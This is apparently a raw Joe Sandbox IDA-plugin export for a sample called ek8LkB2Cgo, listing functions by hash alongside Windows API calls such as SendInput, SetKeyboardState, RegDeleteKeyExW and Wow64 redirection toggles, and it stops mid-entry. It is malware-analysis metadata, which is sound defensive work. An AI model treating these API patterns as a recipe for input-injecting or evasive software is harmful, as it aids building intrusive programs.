                                                                                  • Instruction ID: 1c3164db77b1ab373eae3bd6cd3294e8443d3e4d07b11240c444a4e232ae05ed
                                                                                  • Opcode Fuzzy Hash: 4d2840879cdc8413558f3264e278c67dcfe3050d57d02a14cb0fa332f8104839
                                                                                  • Instruction Fuzzy Hash: 3A219C32500218ABDF118EA4CC56FEA3B7AFF88714F100215FE55AB190D7B5A858DBA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0055A941
                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0055A94F
                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0055A956
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 4014797782-2298589950
                                                                                  • Opcode ID: e9cc6f2a3769ac6ebfbe767bd9a3077ca0fdc94c8772045bac7fdc791e7340af
                                                                                  • Instruction ID: bbcc1faf9cbef32a090b7df710d4f5f695521869152cb2656e51d3de0c25d257
                                                                                  • Opcode Fuzzy Hash: e9cc6f2a3769ac6ebfbe767bd9a3077ca0fdc94c8772045bac7fdc791e7340af
                                                                                  • Instruction Fuzzy Hash: FF21AEB5600209AFDB10DF18CCA1DB73BBDFF5A3A4B04025AFA049B261CB30EC159B61
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00559A30
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00559A40
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00559A65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: 771ae053037b2c734b6db204eb2acc05776578953a4ede672aa6630423cb9ad8
                                                                                  • Instruction ID: eaa1993fd6483fd4e5f6109557d7328816f6afef165d5cfd33d230e11d8b57f1
                                                                                  • Opcode Fuzzy Hash: 771ae053037b2c734b6db204eb2acc05776578953a4ede672aa6630423cb9ad8
                                                                                  • Instruction Fuzzy Hash: 7521D032600118BFDF218F54DC85EBB3BBAFF89761F01812AF9449B190C6759C5597A0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0055A46D
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0055A482
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0055A48F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: 7eac22bf559ba28c5fb0c574b00cafa257e048e653091dfdd1c881bbc86e2f94
                                                                                  • Instruction ID: 184feb8f85ce839641835b01a5d9d0e209d5fc5fb07460919fac409f086a4b9a
                                                                                  • Opcode Fuzzy Hash: 7eac22bf559ba28c5fb0c574b00cafa257e048e653091dfdd1c881bbc86e2f94
                                                                                  • Instruction Fuzzy Hash: 1611E771200208BEEF245FA4CC59FAB3B69FFC9754F014219FA45A6091D7B1E815DB24
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00512350,?), ref: 005122A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 005122A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 2574300362-340411864
                                                                                  • Opcode ID: 45dbc129259a4bea6f2342aa30902cc236bab3010d29591b9f9855e88ab8fa9e
                                                                                  • Instruction ID: 2803736e868363797d9f85a74b0c4498254973c39c3145862a4a39054e455d8d
                                                                                  • Opcode Fuzzy Hash: 45dbc129259a4bea6f2342aa30902cc236bab3010d29591b9f9855e88ab8fa9e
                                                                                  • Instruction Fuzzy Hash: 09E01A74A90300ABEB905F74EC4EB5A3A74BB21702F005120F106E50E0DBB55098FF24
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00512276), ref: 00512376
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0051237D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 2574300362-2819208100
                                                                                  • Opcode ID: 906858997ababaa6b0d6ae0267f9733ee9b29b5568e7253ab495a50ab6fd3173
                                                                                  • Instruction ID: 953fbb4dceba7510ec0b61369c4de9f3d30de423982bce0a8395201c6e9c1b6b
                                                                                  • Opcode Fuzzy Hash: 906858997ababaa6b0d6ae0267f9733ee9b29b5568e7253ab495a50ab6fd3173
                                                                                  • Instruction Fuzzy Hash: 91E0B670544300ABEBA45F64FD0DB0A3A78BB20702F105924F10DE20F0DBB9A498FE24
                                                                                  Similarity
                                                                                  • API ID: LocalTime__swprintf
                                                                                  • String ID: %.3d$WIN_XPe
                                                                                  • API String ID: 2070861257-2409531811
                                                                                  • Opcode ID: 088ba83365671af345b89e0d3d93c5bbb6540bc3ff7dfe3675080ac78d1de3ad
                                                                                  • Instruction ID: 0f7bb6a4c3afcc6fd4a92eec72f7e118ff3c4691fa938ceb24c8cbbf78c7ba3d
                                                                                  • Opcode Fuzzy Hash: 088ba83365671af345b89e0d3d93c5bbb6540bc3ff7dfe3675080ac78d1de3ad
                                                                                  • Instruction Fuzzy Hash: AFE01271804A18DBEB509790DD45DF97BBCBB04741F1408D2B906B3140D6359FC4AF22
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,005521FB,?,005523EF), ref: 00552213
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00552225
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                  • API String ID: 2574300362-399901964
                                                                                  • Opcode ID: c31c7658826d651b2749c6573ca2b62241c3a81f63809f0e2ec49d1e406905b4
                                                                                  • Instruction ID: f753635bf845ee2c0fe30a928ea60911a52d13770d8f3655c07e1d8e57ad4c92
                                                                                  • Opcode Fuzzy Hash: c31c7658826d651b2749c6573ca2b62241c3a81f63809f0e2ec49d1e406905b4
                                                                                  • Instruction Fuzzy Hash: 31D05E388007129FC7215BA4B8086057AF8BF1A311F10441AAC45A2150E7B0D8C8EF60
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004F42EC,?,004F42AA,?), ref: 004F4304
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F4316
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-1355242751
                                                                                  • Opcode ID: ef34960408a9feb7876b0ecf9cab7e463494b37a63875fd3ef1b20d684ab19ec
                                                                                  • Instruction ID: af1a4f8472de8170e08ff7ab86e4548f524e151d8429ee465619c0da2442caea
                                                                                  • Opcode Fuzzy Hash: ef34960408a9feb7876b0ecf9cab7e463494b37a63875fd3ef1b20d684ab19ec
                                                                                  • Instruction Fuzzy Hash: 26D0A7309007129FC7204F64F80C6177BF8BF55311F00441AED45D2260EBB4C8C4DB20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,004F41BB,004F4341,?,004F422F,?,004F41BB,?,?,?,?,004F39FE,?,00000001), ref: 004F4359
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F436B
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-3689287502
                                                                                  • Opcode ID: a778fd8f045cc0806babdbf03fa62b1d0dbc52a99049c2252fabb561e2857bf3
                                                                                  • Instruction ID: 7db7e18d60288ece865d965e24fe79add96c2ebf8a8961a06866cc6d04b52c90
                                                                                  • Opcode Fuzzy Hash: a778fd8f045cc0806babdbf03fa62b1d0dbc52a99049c2252fabb561e2857bf3
                                                                                  • Instruction Fuzzy Hash: CED0A7305047129FC7204F34F8086177BF8BF21715F01441AED95D2250DBB4D8C4DB20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0053052F,?,005306D7), ref: 00530572
                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00530584
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                  • API String ID: 2574300362-1587604923
                                                                                  • Opcode ID: 5489a1b962bf3b06577267ca876e7987b8684bd591bf6e55f4077f8823a580cc
                                                                                  • Instruction ID: f4b022d4fcb5a56622c742e3a98e7f19408d845f4b1ad1bcb304d246743e3f9d
                                                                                  • Opcode Fuzzy Hash: 5489a1b962bf3b06577267ca876e7987b8684bd591bf6e55f4077f8823a580cc
                                                                                  • Instruction Fuzzy Hash: 0ED052316003229EC7205F28A80AA06BFF8BF15310F50842AE889E2290EAB0C8C4DA20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0053051D,?,005305FE), ref: 00530547
                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00530559
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                  • API String ID: 2574300362-1071820185
                                                                                  • Opcode ID: 8a8b1ca1ed18ad8d206b8b99b37ea60585285bb8dba8c83acc3a4b7d996219be
                                                                                  • Instruction ID: f3773ff823047707a81361b75771bb209d2e323b6481a26e150fde18cba8ff46
                                                                                  • Opcode Fuzzy Hash: 8a8b1ca1ed18ad8d206b8b99b37ea60585285bb8dba8c83acc3a4b7d996219be
                                                                                  • Instruction Fuzzy Hash: FFD0A7304007129FC7208F24F80A6057FF4BF11311F50D41DE44AD2190E674C8C4DA20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0054ECBE,?,0054EBBB), ref: 0054ECD6
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0054ECE8
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: 0954ee8f80172701f85489d4adb43de6bf15d4a5df1f1e72cf23205a2a1e5ee9
                                                                                  • Instruction ID: 42a238beb0860fb7e81ee1cb4003e16a99016178b03a22dbb2d6f18a94b83c66
                                                                                  • Opcode Fuzzy Hash: 0954ee8f80172701f85489d4adb43de6bf15d4a5df1f1e72cf23205a2a1e5ee9
                                                                                  • Instruction Fuzzy Hash: 14D05E304007239ECB205B64A8896467EF8BF15314B008419A84992191DAB0C8C4EA20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0054BAD3,00000001,0054B6EE,?,0058DC00), ref: 0054BAEB
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0054BAFD
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                  • API String ID: 2574300362-199464113
                                                                                  • Opcode ID: 563a47e7e5f75b24bbc92cd5cff7d04685b4f553957b3095ff4563bc74d90b12
                                                                                  • Instruction ID: a58df38fbdb08b6d40cb88a8d44f174007567ae0358b3fa0ddb2a09c211ce249
                                                                                  • Opcode Fuzzy Hash: 563a47e7e5f75b24bbc92cd5cff7d04685b4f553957b3095ff4563bc74d90b12
                                                                                  • Instruction Fuzzy Hash: 72D09E709007129FD7305F65B849A557AF8BF15755B108419A857A2154D7B0D8C4DA60
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00553BD1,?,00553E06), ref: 00553BE9
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00553BFB
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: cdc762987c4420dfa40a9726bddc84ee33c8f81e9be586c93b1df5bb95c2d984
                                                                                  • Instruction ID: a7b1fb41e764d1f549a45eea8cc23ef4170f379ae0ed95489aa7268bb2ce5afb
                                                                                  • Opcode Fuzzy Hash: cdc762987c4420dfa40a9726bddc84ee33c8f81e9be586c93b1df5bb95c2d984
                                                                                  • Instruction Fuzzy Hash: 04D09E70500752DAD7205FA5B81864ABEB4BF56765B1044AAE859A2150D6B0D888DE60
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c435d255e87ecd3ea32d9602db07130bc45124da01980d00a8f3fcfee33cc0e
                                                                                  • Instruction ID: b2a399d1bf3cd8e9a56d01e1b88ba4a66a07702d81d612f452a9543a0558c439
                                                                                  • Opcode Fuzzy Hash: 7c435d255e87ecd3ea32d9602db07130bc45124da01980d00a8f3fcfee33cc0e
                                                                                  • Instruction Fuzzy Hash: FAC15E75A0022AEFDB14CF94D884AAEBBB5FF49710F114598E905EB391D730DE41DBA0
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0054AAB4
                                                                                  • CoUninitialize.OLE32 ref: 0054AABF
                                                                                    • Part of subcall function 00530213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0053027B
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054AACA
                                                                                  • VariantClear.OLEAUT32(?), ref: 0054AD9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 780911581-0
                                                                                  • Opcode ID: eba9c11c9fc631a0498613d3bed26597876acc7a6e2f634763ae3af8dc151606
                                                                                  • Instruction ID: 964926f8ddcafc32138b82b3e3804cf314937ab8d36387a7195bf9583e9eeec9
                                                                                  • Opcode Fuzzy Hash: eba9c11c9fc631a0498613d3bed26597876acc7a6e2f634763ae3af8dc151606
                                                                                  • Instruction Fuzzy Hash: 1AA157356447019FDB50DF15C485B6ABBE5BF88318F04884DFA9A9B3A2CB34ED44CB86
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: 8f04d841ff1a38a4c5f535532a2ae377655b591cfca9123eb8035c7eb6dbb0e2
                                                                                  • Instruction ID: 3993580211ae5124de2d94ec3402677c0dbf4ccf0cb6739b2795c40093af7d26
                                                                                  • Opcode Fuzzy Hash: 8f04d841ff1a38a4c5f535532a2ae377655b591cfca9123eb8035c7eb6dbb0e2
                                                                                  • Instruction Fuzzy Hash: 61518334A003169BDB24EF66E495A2EBBE5FF66314F208C1FE546CB3D1DB7498808715
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 3877424927-0
                                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                  • Instruction ID: 6773de627c84ef1568470d644c6d20810275e40f71f944b62cba36b4abcccfc9
                                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                  • Instruction Fuzzy Hash: 165184B4A00306EBFB249F6988A55EE7FA5FF40320F248769F825962D0D7719FD49B40
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(015D70E0,?), ref: 0055C544
                                                                                  • ScreenToClient.USER32(?,00000002), ref: 0055C574
                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0055C5DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3880355969-0
                                                                                  • Opcode ID: 032b94c3dc11694240a47dc2167e9670f01fc524942da287adab9dd9f94233b5
                                                                                  • Instruction ID: 0ec8785ba0a1cf4a7dbc4794b25c84673c6859d26bcb0ee770c40c251e9ac0d8
                                                                                  • Opcode Fuzzy Hash: 032b94c3dc11694240a47dc2167e9670f01fc524942da287adab9dd9f94233b5
                                                                                  • Instruction Fuzzy Hash: 25515C75900205AFCF10DFA8D8A09AE7FB5FF55721F20825AF9159B290E730ED85DB90
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0052C462
                                                                                  • __itow.LIBCMT ref: 0052C49C
                                                                                    • Part of subcall function 0052C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0052C753
                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0052C505
                                                                                  • __itow.LIBCMT ref: 0052C55A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: dba6d132685e2ebfe9e0b795040a1d870f03a025fee7f257de08490eac130a95
                                                                                  • Instruction ID: 716e3222184c5b399e9d9184e25bc65d110f86bbeac0be57ad90a59568d09c3a
                                                                                  • Opcode Fuzzy Hash: dba6d132685e2ebfe9e0b795040a1d870f03a025fee7f257de08490eac130a95
                                                                                  • Instruction Fuzzy Hash: 4341D431A0061DAFDF21EF54D846BFE7FB5BF4A704F00001AFA05A3182DB74AA458BA5
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00533966
                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00533982
                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 005339EF
                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00533A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 814f96f70c37910fbc5377846a61f2182d4bdd97cd62eca8440a8583d94aa300
                                                                                  • Instruction ID: 7f6b4a26a9856524a971a6025dc84e3371ae0e810ed4cbdd303297ae55c9672c
                                                                                  • Opcode Fuzzy Hash: 814f96f70c37910fbc5377846a61f2182d4bdd97cd62eca8440a8583d94aa300
                                                                                  • Instruction Fuzzy Hash: 3541F371A04248EEEF208F65C80ABFDBFB9BB95311F04015AF4C5962D1C7B48E89E765
                                                                                  APIs
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0053E742
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0053E768
                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0053E78D
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0053E7B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 3321077145-0
                                                                                  • Opcode ID: 950061ab7faabbdeaecd51987f28e1f2bf7d6b9c3ee454d5ad31924dc131c33f
